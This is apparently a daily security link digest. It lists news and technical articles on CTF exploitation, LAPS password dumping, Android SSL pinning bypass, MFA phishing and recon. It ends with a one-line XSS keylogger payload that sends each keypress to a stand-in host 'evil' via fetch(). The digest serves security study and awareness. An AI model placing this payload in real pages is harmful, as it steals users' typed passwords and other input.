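Highlights: picoCTF Write-up: bypassing ASLR via a format string bug; dumping LAPS passwords with ldapsearch; bypassing Android SSL pinning with Frida; authentication attacks using the ESP8266 module; exploring command injection in voice-based authentication systems; HackerOne's official blog on information gathering ahead of a penetration test
News:
IBM launches security testing services for IoT and connected cars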
http://www.securityweek.com/ibm-launches-security-testing-services-cars-iot
[International news] British man pleads guilty to using the Mirai botnet to attack nearly one million Deutsche Telekom routers
http://bobao.360.cn/news/detail/4238.html
Technical:
picoCTF Write-up: bypassing ASLR via a format string bug
https://0x00sec.org/t/picoctf-write-up-bypassing-aslr-via-format-string-bug/1920
Dumping LAPS passwords with ldapsearch
https://room362.com/post/2017/dump-laps-passwords-with-ldapsearch/
Bypassing Android SSL pinning with Frida
https://techblog.mediaservice.net/2017/07/universal-android-ssl-pinning-bypass-with-frida/
Authentication attacks using the ESP8266 module
Open Sourcing JA3: an SSL/TLS client fingerprinting project for malware detection
https://engineering.salesforce.com/open-sourcing-ja3-92c9e53c3c41
Exploring command injection in voice-based authentication systems
https://www.youtube.com/playlist?list=PLl6DAJhNeWAmOcGC38tLlFGdevLniiUmG
Metadata: a hacker's best friend
https://blog.sweepatic.com/metadata-hackers-best-friend/
Phishing techniques against sites with two-factor authentication
http://www.openskycorp.com/resource-center/blog/phishing-way-past-multi-factor-authentication/
HackerOne's official blog on how to do information gathering ahead of a penetration test
https://www.hackerone.com/blog/how-to-recon-and-content-discovery
Official Kali Linux book
https://kali.training/downloads/Kali_Revealed_1st_edition.pdf
Unsupervised Clustering Under Temporal Feature Volatility in Network Stack Fingerprinting
http://irl.cs.tamu.edu/people/zain/papers/sigmetrics2016.pdf
XSS Keylogger
<img src=x onerror='document.onkeypress=function(e){fetch("//evil?k="+String.fromCharCode(e.which))},this.remove();'>
from @i_bo0om